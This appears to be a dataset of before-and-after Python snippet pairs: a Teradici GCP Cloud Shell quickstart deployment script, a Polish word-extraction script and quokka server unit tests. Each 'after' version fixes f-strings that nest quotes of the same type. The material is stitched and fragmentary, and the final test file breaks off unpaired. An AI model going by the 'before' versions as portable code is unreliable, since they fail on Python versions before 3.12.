'members': [f'serviceAccount:{service_account['email']}'],
}
policy['bindings'].append(binding)
policy = crm_service.projects().setIamPolicy(
resource = PROJECT_ID,
body = {
'policy': policy
}
).execute()
return policy
def apis_enable(apis):
print('Enabling APIs:')
# Using shell command, no Python Google Cloud Client library support
for api in apis:
print(f' {api}...')
subprocess.run(['gcloud', 'services', 'enable', api], check=True)
def ssh_key_create(path):
print('Creating SSH key...')
# note the space after '-N' is required
ssh_cmd = f'ssh-keygen -f {path} -t rsa -q -N '
subprocess.run(ssh_cmd.split(' '), check=True)
# Creates a new .tfvar based on the .tfvar.sample file
def tf_vars_create(ref_file_path, tfvar_file_path, settings):
if os.path.exists(tfvar_file_path):
overwrite = input("Found an existing .tfvar file, overwrite (y/n)? ").strip().lower()
if overwrite not in ('y', 'yes'):
print(f'{tfvar_file_path} already exists. Exiting...')
sys.exit(1)
with open(ref_file_path, 'r') as ref_file, open(tfvar_file_path, 'w') as out_file:
for line in ref_file:
if line[0] == '#':
# Check if it's an optional variable and uncomment if so
for k in settings.keys():
# Building string using + because can't use f"{k}" with regex
pattern = "^#\s*(" + k + ")\s*="
if re.search(pattern, line.strip()):
line = f'{k} = "{settings[k]}"\n'
elif line[0] != '\n':
key = line.split('=')[0].strip()
line = f'{key} = "{settings[key]}"\n'
out_file.write(line)
if __name__ == '__main__':
ensure_requirements()
print('Setting GCP project...')
sa_email = f'{SA_ID}@{PROJECT_ID}.iam.gserviceaccount.com'
iam_service = googleapiclient.discovery.build('iam', 'v1')
crm_service = googleapiclient.discovery.build('cloudresourcemanager', 'v1')
apis_enable(REQUIRED_APIS)
sa = service_account_create(sa_email)
iam_policy_update(sa, SA_ROLES)
print('GCP project setup complete.\n')
cfg_data = interactive.configurations_get(PROJECT_ID, WS_TYPES, ENTITLE_USER)
print('Preparing local requirements...')
os.chdir('../')
os.chdir(DEPLOYMENT_PATH)
# Paths passed into terraform.tfvars should be absolute paths
cwd = os.getcwd() + '/'
try:
print(f'Creating directory {SECRETS_DIR} to store secrets...')
os.mkdir(SECRETS_DIR, 0o700)
except FileExistsError:
print(f'Directory {SECRETS_DIR} already exists.')
ssh_key_create(SSH_KEY_PATH)
print('Local requirements setup complete.\n')
print('Setting CAS Manager...')
mycasmgr = casmgr.CASManager(cfg_data.get('api_token'))
# TODO: Add a proper clean up of GCP IAM resources so we don't have to move the
# service account creation to here after the rest of the GCP setup
sa_key = service_account_create_key(sa, GCP_SA_KEY_PATH)
print(f'Creating deployment {DEPLOYMENT_NAME}...')
deployment = mycasmgr.deployment_create(DEPLOYMENT_NAME, cfg_data.get('reg_code'))
mycasmgr.deployment_add_gcp_account(sa_key, deployment)
print('Creating CAS Manager API key...')
cas_mgr_deployment_key = mycasmgr.deployment_key_create(deployment)
print('CAS Manager setup complete.\n')
print('Encrypting secrets...')
days90 = 7776000
kms_client = kms.KeyManagementServiceClient()
parent = f"projects/{PROJECT_ID}/locations/{cfg_data.get("gcp_region")}"
key_ring_id = 'cloud_deployment_scripts'
key_ring_init = {}
try:
key_ring = kms_client.create_key_ring(request={'parent': parent, 'key_ring_id': key_ring_id, 'key_ring': key_ring_init})
print(f'Created Key Ring {key_ring.name}')
except google_exc.AlreadyExists:
print(f'Key Ring {key_ring_id} already exists. Using it...')
parent = kms_client.key_ring_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id)
crypto_key_id = 'quickstart_key'
crypto_key_init = {
'purpose': kms.CryptoKey.CryptoKeyPurpose.ENCRYPT_DECRYPT,
'rotation_period': {'seconds': days90},
'next_rotation_time': {'seconds': int(time.time()) + days90},
}
try:
crypto_key = kms_client.create_crypto_key(request={'parent': parent, 'crypto_key_id': crypto_key_id, 'crypto_key': crypto_key_init})
print(f'Created Crypto Key {crypto_key.name}')
except google_exc.AlreadyExists:
print(f'Crypto Key {crypto_key_id} already exists. Using it...')
key_name = kms_client.crypto_key_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id, crypto_key_id)
def kms_encode(key, text, base64_encoded=False):
encrypted = kms_client.encrypt(request={'name': key, 'plaintext': text.encode('utf-8')})
if base64_encoded:
return base64.b64encode(encrypted.ciphertext).decode('utf-8')
return encrypted.ciphertext
cfg_data['ad_password'] = kms_encode(key_name, cfg_data.get('ad_password'), True)
cfg_data['reg_code'] = kms_encode(key_name, cfg_data.get('reg_code'), True)
cas_mgr_deployment_key_encrypted = kms_encode(key_name, json.dumps(cas_mgr_deployment_key))
print('Done encrypting secrets.')
print('Creating CAS Manager Deployment Service Account Key...')
with open(CAS_MGR_DEPLOYMENT_SA_KEY_PATH, 'wb+') as keyfile:
keyfile.write(cas_mgr_deployment_key_encrypted)
print(' Key written to ' + CAS_MGR_DEPLOYMENT_SA_KEY_PATH)
print('Deploying with Terraform...')
#TODO: refactor this to work with more types of deployments
settings = {
'gcp_credentials_file': cwd + GCP_SA_KEY_PATH,
'gcp_region': cfg_data.get('gcp_region'),
'gcp_zone': cfg_data.get('gcp_zone'),
'kms_cryptokey_id': key_name,
'dc_admin_password': cfg_data.get('ad_password'),
'safe_mode_admin_password': cfg_data.get('ad_password'),
'ad_service_account_password': cfg_data.get('ad_password'),
'cac_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'win_gfx_instance_count': cfg_data.get('gwin'),
'win_std_instance_count': cfg_data.get('swin'),
'centos_gfx_instance_count': cfg_data.get('gcent'),
'centos_std_instance_count': cfg_data.get('scent'),
'centos_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'pcoip_registration_code': cfg_data.get('reg_code'),
'cas_mgr_deployment_sa_file': cwd + CAS_MGR_DEPLOYMENT_SA_KEY_PATH
}
# update tfvar
tf_vars_create(TF_VARS_REF_PATH, TF_VARS_PATH, settings)
tf_cmd = f'{TERRAFORM_BIN_PATH} init'
subprocess.run(tf_cmd.split(' '), check=True)
tf_cmd = f'{TERRAFORM_BIN_PATH} apply -auto-approve'
subprocess.run(tf_cmd.split(' '), check=True)
comp_proc = subprocess.run([TERRAFORM_BIN_PATH,'output','cac-public-ip'],
check=True,
stdout=subprocess.PIPE)
cac_public_ip = comp_proc.stdout.decode().split('"')[1]
print('Terraform deployment complete.\n')
# To update the auth_token used by the session header for the API call
# with the one from the deployment key in case the API Token expires
mycasmgr.deployment_signin(cas_mgr_deployment_key)
# Add existing workstations
for t in WS_TYPES:
for i in range(int(cfg_data.get(t))):
hostname = f'{t}-{i}'
print(f'Adding "{hostname}" to CAS Manager...')
mycasmgr.machine_add_existing(
hostname,
PROJECT_ID,
cfg_data.get('gcp_zone'),
deployment
)
# Loop until Administrator user is found in CAS Manager
while True:
entitle_user = mycasmgr.user_get(ENTITLE_USER, deployment)
if entitle_user:
break
print(f'Waiting for user "{ENTITLE_USER}" to be synced. Retrying in 10 seconds...')
time.sleep(10)
# Add entitlements for each workstation
machines_list = mycasmgr.machines_get(deployment)
for machine in machines_list:
print(f'Assigning workstation "{machine['machineName']}" to user "{ENTITLE_USER}"...')
mycasmgr.entitlement_add(entitle_user, machine)
print('\nQuickstart deployment finished.\n')
print('')
next_steps = f"""
Next steps:
- Connect to a workstation:
1. from a PCoIP client, connect to the Cloud Access Connector at {cac_public_ip}
2. sign in with the "{ENTITLE_USER}" user credentials
3. When connecting to a workstation immediately after this script completes,
the workstation (especially graphics ones) may still be setting up. You may
see "Remote Desktop is restarting..." in the client. Please wait a few
minutes or reconnect if it times out.
- Add additional workstations:
1. Log in to https://cas.teradici.com
2. Click on "Workstations" in the left panel, select "Create new remote
workstation" from the "+" button
3. Select connector "quickstart_cac_<timestamp>"
4. Fill in the form according to your preferences. Note that the following
values must be used for their respective fields:
Region: "{cfg_data.get('gcp_region')}"
Zone: "{cfg_data.get('gcp_zone')}"
Network: "vpc-cas"
Subnetowrk: "subnet-ws"
Domain name: "example.com"
Domain service account: "cas_ad_admin"
Service account password: <set by you at start of script>
5. Click **Create**
- Clean up:
1. Using GCP console, delete all workstations created by CAS Manager
web interface and manually created workstations. Resources not created by
the Terraform scripts must be manually removed before Terraform can
properly destroy resources it created.
2. In GCP cloudshell, change directory using the command "cd ~/cloudshell_open/cloud_deployment_scripts/{DEPLOYMENT_PATH}"
3. Remove resources deployed by Terraform using the command "terraform destroy". Enter "yes" when prompted.
"{'terraform' if TERRAFORM_BIN_PATH == shutil.which('terraform') else TERRAFORM_BIN_PATH} destroy"
4. Log in to https://cas.teradici.com and delete the deployment named
"quickstart_deployment_<timestamp>"
"""
print(next_steps)
print('')
| #!/usr/bin/env python3
# Copyright (c) 2019 Teradici Corporation
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import base64
import datetime
import importlib
import json
import os
import re
import shutil
import site
import subprocess
import sys
import textwrap
import time
import casmgr
import interactive
REQUIRED_PACKAGES = {
'google-api-python-client': None,
'grpc-google-iam-v1': None,
'google-cloud-kms': "2.0.0"
}
# Service Account ID of the service account to create
SA_ID = 'cas-manager'
SA_ROLES = [
'roles/editor',
'roles/cloudkms.cryptoKeyEncrypterDecrypter'
]
PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT']
REQUIRED_APIS = [
'deploymentmanager.googleapis.com',
'cloudkms.googleapis.com',
'cloudresourcemanager.googleapis.com',
'compute.googleapis.com',
'dns.googleapis.com',
'iam.googleapis.com',
]
iso_time = datetime.datetime.utcnow().isoformat(timespec='seconds').replace(':','').replace('-','') + 'Z'
DEPLOYMENT_NAME = 'quickstart_deployment_' + iso_time
CONNECTOR_NAME = 'quickstart_cac_' + iso_time
# User entitled to workstations
ENTITLE_USER = 'Administrator'
HOME = os.path.expanduser('~')
TERRAFORM_BIN_DIR = f'{HOME}/bin'
TERRAFORM_BIN_PATH = TERRAFORM_BIN_DIR + '/terraform'
TERRAFORM_VER_PATH = '../deployments/gcp/single-connector/versions.tf'
CFG_FILE_PATH = 'gcp-cloudshell-quickstart.cfg'
DEPLOYMENT_PATH = 'deployments/gcp/single-connector'
# All of the following paths are relative to the deployment directory, DEPLOYMENT_PATH
TF_VARS_REF_PATH = 'terraform.tfvars.sample'
TF_VARS_PATH = 'terraform.tfvars'
SECRETS_DIR = 'secrets'
GCP_SA_KEY_PATH = SECRETS_DIR + '/gcp_service_account_key.json'
SSH_KEY_PATH = SECRETS_DIR + '/cas_mgr_admin_id_rsa'
CAS_MGR_DEPLOYMENT_SA_KEY_PATH = SECRETS_DIR + '/cas_mgr_deployment_sa_key.json.encrypted'
# Types of workstations
WS_TYPES = ['scent', 'gcent', 'swin', 'gwin']
def ensure_requirements():
if not PROJECT_ID:
print('The PROJECT property has not been set.')
print('Please run "gcloud config set project [PROJECT_ID]" to set the project.')
print('See: https://cloud.google.com/sdk/gcloud/reference/config/set')
print('')
sys.exit(1)
ensure_required_packages()
import_modules()
ensure_terraform()
def ensure_required_packages():
"""A function that ensures the correct version of Python packages are installed.
The function first checks if the required packages are installed. If a package is
installed, the required version number will then be checked. It will next prompt
the user to update or install the required packages.
"""
packages_to_install_list = []
for package, required_version in REQUIRED_PACKAGES.items():
check_cmd = f'{sys.executable} -m pip show {package}'
output = subprocess.run(check_cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')
# If a package is not found, skip version checking and simply install the latest package
if not output:
packages_to_install_list.append(package)
elif required_version is not None:
# Second line outputs the version of the specified package
current_version = output.splitlines()[1].split(' ')[-1]
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple < required_version_tuple:
packages_to_install_list.append(package)
if packages_to_install_list:
# Convert the list to a string of packages delimited by a space
packages_to_install = " ".join(packages_to_install_list)
install_cmd = f'{sys.executable} -m pip install --upgrade {packages_to_install} --user'
install_permission = input(
'One or more of the following Python packages are outdated or missing:\n'
f' {packages_to_install}\n\n'
'The script can install these packages in the user\'s home directory using the following command:\n'
f' {install_cmd}\n'
'Proceed? (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Python packages are required for deployment. Exiting...')
sys.exit(1)
subprocess.check_call(install_cmd.split(' '))
# Refresh sys.path to detect new modules in user's home directory.
importlib.reload(site)
def import_modules():
"""A function that dynamically imports required Python packages.
"""
# Global calls for import statements are required to avoid module not found error
import_required_packages = '''\
import googleapiclient.discovery
from google.cloud import kms
from google.api_core import exceptions as google_exc
'''
# Recommended to clear cache after installing python packages for dynamic imports
importlib.invalidate_caches()
exec(textwrap.dedent(import_required_packages), globals())
print('Successfully imported required Python packages.')
def ensure_terraform():
"""A function that ensures the required Terraform version is installed.
The function first checks if the required Terraform version is installed in
the user's system. If Terraform is not installed, it will prompt the user to
install Terraform in the user's home directory.
"""
global TERRAFORM_BIN_PATH
path = shutil.which('terraform')
# Reference versions.tf file for the required version
with open(TERRAFORM_VER_PATH,"r") as f:
data = f.read()
required_version = re.search(r'\">=\s([\d.]+)\"', data).group(1)
if path:
cmd = 'terraform -v'
# Run the command 'terraform -v' and use the first line as the Terraform version
terraform_version = subprocess.run(cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()[0]
print(f'Found {terraform_version} in {path}.')
# Use regex to parse the version number from string (i.e. 0.12.18)
current_version = re.search(r'Terraform\s*v([\d.]+)', terraform_version).group(1)
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple >= required_version_tuple:
TERRAFORM_BIN_PATH = path
return
install_permission = input(
f'This system is missing Terraform version >= {required_version}.\n'
f'Proceed to download and install Terraform in {TERRAFORM_BIN_DIR} (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Terraform is required for deployment. Exiting...')
sys.exit(1)
install_cmd = f'{sys.executable} install-terraform.py {TERRAFORM_BIN_DIR}'
subprocess.run(install_cmd.split(' '), check=True)
def quickstart_config_read(cfg_file):
cfg_data = {}
with open(cfg_file, 'r') as f:
for line in f:
if line[0] in ('#', '\n'):
continue
key, value = map(str.strip, line.split(':'))
cfg_data[key] = value
return cfg_data
def service_account_find(email):
service_accounts = iam_service.projects().serviceAccounts().list(
name = f'projects/{PROJECT_ID}',
).execute()
if not service_accounts:
return
for account in service_accounts['accounts']:
if account['email'] == email:
return account
def service_account_create(email):
print('Creating Service Account...')
service_account = service_account_find(email)
if service_account:
print(f' Service account {email} already exists.')
# The service account limit check is placed here so that the script doesn't
# unfortunately exit after the user enters their configurations if error, but
# the key will be created later to avoid reaching the limit, in case
# something goes wrong and the script exits before the key is used.
service_account_create_key_limit_check(service_account)
return service_account
service_account = iam_service.projects().serviceAccounts().create(
name = 'projects/' + PROJECT_ID,
body = {
'accountId': SA_ID,
'serviceAccount': {
'displayName': SA_ID,
'description': 'Account used by CAS Manager to manage PCoIP workstations.',
}
}
).execute()
print(' Created service account: ' + service_account['email'])
return service_account
def service_account_create_key(service_account, filepath):
print(f'Created key for {service_account["email"]}...')
key = iam_service.projects().serviceAccounts().keys().create(
name = 'projects/-/serviceAccounts/' + service_account['email'],
body = {},
).execute()
key_data = base64.b64decode(key['privateKeyData'])
with open(filepath, 'wb') as keyfile:
keyfile.write(key_data)
print(' Key written to ' + filepath)
return json.loads(key_data.decode('utf-8'))
def service_account_create_key_limit_check(service_account):
print(f' Checking number of keys owned by {service_account["email"]}... ', end='')
keys = iam_service.projects().serviceAccounts().keys().list(
name='projects/-/serviceAccounts/' + service_account['email']
).execute()['keys']
user_managed_keys = list(filter(lambda k: (k['keyType'] == 'USER_MANAGED'), keys))
print(f'{len(user_managed_keys)}/10')
if len(user_managed_keys) >= 10:
print(f' ERROR: The service account has reached the limit of the number of keys it can create.',
' Please see: https://cloud.google.com/iam/docs/creating-managing-service-account-keys',
'Exiting script...', sep='\n')
sys.exit(1)
def iam_policy_update(service_account, roles):
policy = crm_service.projects().getIamPolicy(
resource = PROJECT_ID,
body = {},
).execute()
print('Adding roles:')
for role in roles:
print(f' {role}...')
binding = {
'role': role,
'members': [f'serviceAccount:{service_account["email"]}'],
}
policy['bindings'].append(binding)
policy = crm_service.projects().setIamPolicy(
resource = PROJECT_ID,
body = {
'policy': policy
}
).execute()
return policy
def apis_enable(apis):
print('Enabling APIs:')
# Using shell command, no Python Google Cloud Client library support
for api in apis:
print(f' {api}...')
subprocess.run(['gcloud', 'services', 'enable', api], check=True)
def ssh_key_create(path):
print('Creating SSH key...')
# note the space after '-N' is required
ssh_cmd = f'ssh-keygen -f {path} -t rsa -q -N '
subprocess.run(ssh_cmd.split(' '), check=True)
# Creates a new .tfvar based on the .tfvar.sample file
def tf_vars_create(ref_file_path, tfvar_file_path, settings):
if os.path.exists(tfvar_file_path):
overwrite = input("Found an existing .tfvar file, overwrite (y/n)? ").strip().lower()
if overwrite not in ('y', 'yes'):
print(f'{tfvar_file_path} already exists. Exiting...')
sys.exit(1)
with open(ref_file_path, 'r') as ref_file, open(tfvar_file_path, 'w') as out_file:
for line in ref_file:
if line[0] == '#':
# Check if it's an optional variable and uncomment if so
for k in settings.keys():
# Building string using + because can't use f"{k}" with regex
pattern = "^#\s*(" + k + ")\s*="
if re.search(pattern, line.strip()):
line = f'{k} = "{settings[k]}"\n'
elif line[0] != '\n':
key = line.split('=')[0].strip()
line = f'{key} = "{settings[key]}"\n'
out_file.write(line)
if __name__ == '__main__':
ensure_requirements()
print('Setting GCP project...')
sa_email = f'{SA_ID}@{PROJECT_ID}.iam.gserviceaccount.com'
iam_service = googleapiclient.discovery.build('iam', 'v1')
crm_service = googleapiclient.discovery.build('cloudresourcemanager', 'v1')
apis_enable(REQUIRED_APIS)
sa = service_account_create(sa_email)
iam_policy_update(sa, SA_ROLES)
print('GCP project setup complete.\n')
cfg_data = interactive.configurations_get(PROJECT_ID, WS_TYPES, ENTITLE_USER)
print('Preparing local requirements...')
os.chdir('../')
os.chdir(DEPLOYMENT_PATH)
# Paths passed into terraform.tfvars should be absolute paths
cwd = os.getcwd() + '/'
try:
print(f'Creating directory {SECRETS_DIR} to store secrets...')
os.mkdir(SECRETS_DIR, 0o700)
except FileExistsError:
print(f'Directory {SECRETS_DIR} already exists.')
ssh_key_create(SSH_KEY_PATH)
print('Local requirements setup complete.\n')
print('Setting CAS Manager...')
mycasmgr = casmgr.CASManager(cfg_data.get('api_token'))
# TODO: Add a proper clean up of GCP IAM resources so we don't have to move the
# service account creation to here after the rest of the GCP setup
sa_key = service_account_create_key(sa, GCP_SA_KEY_PATH)
print(f'Creating deployment {DEPLOYMENT_NAME}...')
deployment = mycasmgr.deployment_create(DEPLOYMENT_NAME, cfg_data.get('reg_code'))
mycasmgr.deployment_add_gcp_account(sa_key, deployment)
print('Creating CAS Manager API key...')
cas_mgr_deployment_key = mycasmgr.deployment_key_create(deployment)
print('CAS Manager setup complete.\n')
print('Encrypting secrets...')
days90 = 7776000
kms_client = kms.KeyManagementServiceClient()
parent = f"projects/{PROJECT_ID}/locations/{cfg_data.get('gcp_region')}"
key_ring_id = 'cloud_deployment_scripts'
key_ring_init = {}
try:
key_ring = kms_client.create_key_ring(request={'parent': parent, 'key_ring_id': key_ring_id, 'key_ring': key_ring_init})
print(f'Created Key Ring {key_ring.name}')
except google_exc.AlreadyExists:
print(f'Key Ring {key_ring_id} already exists. Using it...')
parent = kms_client.key_ring_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id)
crypto_key_id = 'quickstart_key'
crypto_key_init = {
'purpose': kms.CryptoKey.CryptoKeyPurpose.ENCRYPT_DECRYPT,
'rotation_period': {'seconds': days90},
'next_rotation_time': {'seconds': int(time.time()) + days90},
}
try:
crypto_key = kms_client.create_crypto_key(request={'parent': parent, 'crypto_key_id': crypto_key_id, 'crypto_key': crypto_key_init})
print(f'Created Crypto Key {crypto_key.name}')
except google_exc.AlreadyExists:
print(f'Crypto Key {crypto_key_id} already exists. Using it...')
key_name = kms_client.crypto_key_path(PROJECT_ID, cfg_data.get('gcp_region'), key_ring_id, crypto_key_id)
def kms_encode(key, text, base64_encoded=False):
encrypted = kms_client.encrypt(request={'name': key, 'plaintext': text.encode('utf-8')})
if base64_encoded:
return base64.b64encode(encrypted.ciphertext).decode('utf-8')
return encrypted.ciphertext
cfg_data['ad_password'] = kms_encode(key_name, cfg_data.get('ad_password'), True)
cfg_data['reg_code'] = kms_encode(key_name, cfg_data.get('reg_code'), True)
cas_mgr_deployment_key_encrypted = kms_encode(key_name, json.dumps(cas_mgr_deployment_key))
print('Done encrypting secrets.')
print('Creating CAS Manager Deployment Service Account Key...')
with open(CAS_MGR_DEPLOYMENT_SA_KEY_PATH, 'wb+') as keyfile:
keyfile.write(cas_mgr_deployment_key_encrypted)
print(' Key written to ' + CAS_MGR_DEPLOYMENT_SA_KEY_PATH)
print('Deploying with Terraform...')
#TODO: refactor this to work with more types of deployments
settings = {
'gcp_credentials_file': cwd + GCP_SA_KEY_PATH,
'gcp_region': cfg_data.get('gcp_region'),
'gcp_zone': cfg_data.get('gcp_zone'),
'kms_cryptokey_id': key_name,
'dc_admin_password': cfg_data.get('ad_password'),
'safe_mode_admin_password': cfg_data.get('ad_password'),
'ad_service_account_password': cfg_data.get('ad_password'),
'cac_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'win_gfx_instance_count': cfg_data.get('gwin'),
'win_std_instance_count': cfg_data.get('swin'),
'centos_gfx_instance_count': cfg_data.get('gcent'),
'centos_std_instance_count': cfg_data.get('scent'),
'centos_admin_ssh_pub_key_file': cwd + SSH_KEY_PATH + '.pub',
'pcoip_registration_code': cfg_data.get('reg_code'),
'cas_mgr_deployment_sa_file': cwd + CAS_MGR_DEPLOYMENT_SA_KEY_PATH
}
# update tfvar
tf_vars_create(TF_VARS_REF_PATH, TF_VARS_PATH, settings)
tf_cmd = f'{TERRAFORM_BIN_PATH} init'
subprocess.run(tf_cmd.split(' '), check=True)
tf_cmd = f'{TERRAFORM_BIN_PATH} apply -auto-approve'
subprocess.run(tf_cmd.split(' '), check=True)
comp_proc = subprocess.run([TERRAFORM_BIN_PATH,'output','cac-public-ip'],
check=True,
stdout=subprocess.PIPE)
cac_public_ip = comp_proc.stdout.decode().split('"')[1]
print('Terraform deployment complete.\n')
# To update the auth_token used by the session header for the API call
# with the one from the deployment key in case the API Token expires
mycasmgr.deployment_signin(cas_mgr_deployment_key)
# Add existing workstations
for t in WS_TYPES:
for i in range(int(cfg_data.get(t))):
hostname = f'{t}-{i}'
print(f'Adding "{hostname}" to CAS Manager...')
mycasmgr.machine_add_existing(
hostname,
PROJECT_ID,
cfg_data.get('gcp_zone'),
deployment
)
# Loop until Administrator user is found in CAS Manager
while True:
entitle_user = mycasmgr.user_get(ENTITLE_USER, deployment)
if entitle_user:
break
print(f'Waiting for user "{ENTITLE_USER}" to be synced. Retrying in 10 seconds...')
time.sleep(10)
# Add entitlements for each workstation
machines_list = mycasmgr.machines_get(deployment)
for machine in machines_list:
print(f'Assigning workstation "{machine["machineName"]}" to user "{ENTITLE_USER}"...')
mycasmgr.entitlement_add(entitle_user, machine)
print('\nQuickstart deployment finished.\n')
print('')
next_steps = f"""
Next steps:
- Connect to a workstation:
1. from a PCoIP client, connect to the Cloud Access Connector at {cac_public_ip}
2. sign in with the "{ENTITLE_USER}" user credentials
3. When connecting to a workstation immediately after this script completes,
the workstation (especially graphics ones) may still be setting up. You may
see "Remote Desktop is restarting..." in the client. Please wait a few
minutes or reconnect if it times out.
- Add additional workstations:
1. Log in to https://cas.teradici.com
2. Click on "Workstations" in the left panel, select "Create new remote
workstation" from the "+" button
3. Select connector "quickstart_cac_<timestamp>"
4. Fill in the form according to your preferences. Note that the following
values must be used for their respective fields:
Region: "{cfg_data.get('gcp_region')}"
Zone: "{cfg_data.get('gcp_zone')}"
Network: "vpc-cas"
Subnetowrk: "subnet-ws"
Domain name: "example.com"
Domain service account: "cas_ad_admin"
Service account password: <set by you at start of script>
5. Click **Create**
- Clean up:
1. Using GCP console, delete all workstations created by CAS Manager
web interface and manually created workstations. Resources not created by
the Terraform scripts must be manually removed before Terraform can
properly destroy resources it created.
2. In GCP cloudshell, change directory using the command "cd ~/cloudshell_open/cloud_deployment_scripts/{DEPLOYMENT_PATH}"
3. Remove resources deployed by Terraform using the command "terraform destroy". Enter "yes" when prompted.
"{'terraform' if TERRAFORM_BIN_PATH == shutil.which('terraform') else TERRAFORM_BIN_PATH} destroy"
4. Log in to https://cas.teradici.com and delete the deployment named
"quickstart_deployment_<timestamp>"
"""
print(next_steps)
print('')
|
import glob
from icu import Collator, Locale
import os
import re
import yaml
import shutil
with_sorting = False
outdir = "words"
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.makedirs(outdir)
collator = Collator.createInstance(Locale("pl_PL.UTF-8"))
separator = re.compile("[\W\d]+")
for path in glob.glob("../data/pl/**/*.yml", recursive=True):
print(os.path.basename(path))
with open(path) as file:
meta = yaml.safe_load(file)
with open(path.replace(".yml", ".txt")) as file:
text = file.read().lower().rstrip()
words = set(re.split(separator, text))
with open(f"{outdir}/extracted-words-for-{meta["label"]}.txt", "w") as file:
if with_sorting:
words = sorted(words, key=collator.getSortKey)
file.write("\n".join(words))
| import glob
from icu import Collator, Locale
import os
import re
import yaml
import shutil
with_sorting = False
outdir = "words"
if os.path.exists(outdir):
shutil.rmtree(outdir)
os.makedirs(outdir)
collator = Collator.createInstance(Locale("pl_PL.UTF-8"))
separator = re.compile("[\W\d]+")
for path in glob.glob("../data/pl/**/*.yml", recursive=True):
print(os.path.basename(path))
with open(path) as file:
meta = yaml.safe_load(file)
with open(path.replace(".yml", ".txt")) as file:
text = file.read().lower().rstrip()
words = set(re.split(separator, text))
with open(f"{outdir}/extracted-words-for-{meta['label']}.txt", "w") as file:
if with_sorting:
words = sorted(words, key=collator.getSortKey)
file.write("\n".join(words))
|
import inspect
import unittest
from datetime import datetime
import requests
import yaml
import io
from contextlib import redirect_stdout
from quokka_server.device_monitor import discovery as device_discovery
from quokka_server.service_monitor import discovery as service_discovery
# Note: these tests require the quokka server to be running,
# with TESTDB database, e.g. with the following command:
# export FLASK_APP=quokka_server.py ; export TESTDB ; flask run --port 5001
test_hosts = {
"test-host-1": {
"ip_address": "10.0.0.1",
"mac_address": "00:11:22:33:44:01",
"hostname": "test-host-1",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.501",
},
"test-host-2": {
"ip_address": "10.0.0.2",
"mac_address": "00:11:22:33:44:02",
"hostname": "test-host-2",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.502",
},
}
class TestQuokka(unittest.TestCase):
def test_hosts(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Storing hosts into quokka:")
for hostname, host in test_hosts.items():
rsp = requests.put("http://127.0.0.1:5001/hosts", params={"hostname": hostname}, json=host)
self.assertEqual(rsp.status_code, 204, f"status code: expected 204, received {rsp.status_code}")
print(f"---> host: {hostname} stored into quokka: success")
print("\nRetrieving hosts from quokka:")
rsp = requests.get("http://127.0.0.1:5001/hosts")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
hosts = rsp.json()
print(f"---> Retrieved {len(hosts)} hosts: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(hosts, dict))
self.assertEqual(len(hosts), len(test_hosts), "wrong number of hosts retrieved")
for hostname, host in hosts.items():
self.assertTrue(hostname in test_hosts, f"hostname: {hostname} not in test_hosts")
self.assertEqual(host, test_hosts[hostname], f"host not equal to test_host")
print(f"---> Compared host: {hostname}: success")
def test_devices(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering devices using device_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
device_discovery()
print("Discovering devices using device_monitor: completed")
with open("devices.yaml", "r") as yaml_in:
yaml_devices = yaml_in.read()
devices_from_file = yaml.safe_load(yaml_devices)
print("\nRetrieving devices from quokka:")
rsp = requests.get("http://127.0.0.1:5001/devices")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
devices = rsp.json()
print(f"---> Retrieved {len(devices)} devices: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(devices, dict))
self.assertEqual(len(devices), len(devices_from_file), "wrong number of devices retrieved")
for device_from_file in devices_from_file:
self.assertTrue(device_from_file["name"] in devices, f"device: {device_from_file["name"]} not found in devices")
device = devices[device_from_file["name"]]
self.assertEqual(device_from_file["name"], device["name"], "device names do not match")
self.assertEqual(device_from_file["os"], device["os"], "device oses do not match")
self.assertEqual(device_from_file["hostname"], device["hostname"], "device hostnames do not match")
self.assertEqual(device_from_file["password"], device["password"], "device passwords do not match")
self.assertEqual(device_from_file["username"], device["username"], "device usernames do not match")
self.assertEqual(device_from_file["vendor"], device["vendor"], "device vendors do not match")
self.assertEqual(device_from_file["transport"], device["transport"], "device transports do not match")
print(f"---> Compared device: {device["name"]}: success")
def test_services(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering services using service_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
service_discovery()
print("Discovering services using service_monitor: completed")
with open("services.yaml", "r") as yaml_in:
yaml_services = yaml_in.read()
services_from_file = yaml.safe_load(yaml_services)
print("\nRetrieving services from quokka:")
rsp = requests.get("http://127.0.0.1:5001/services")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
services = rsp.json()
print(f"---> Retrieved {len(services)} services: success")
print(f"\nComparing services to originals")
self.assertTrue(isinstance(services, dict))
self.assertEqual(len(services), len(services_from_file), "wrong number of services retrieved")
for service_from_file in services_from_file:
self.assertTrue(service_from_file["name"] in services, f"service: {service_from_file["name"]} not found in services")
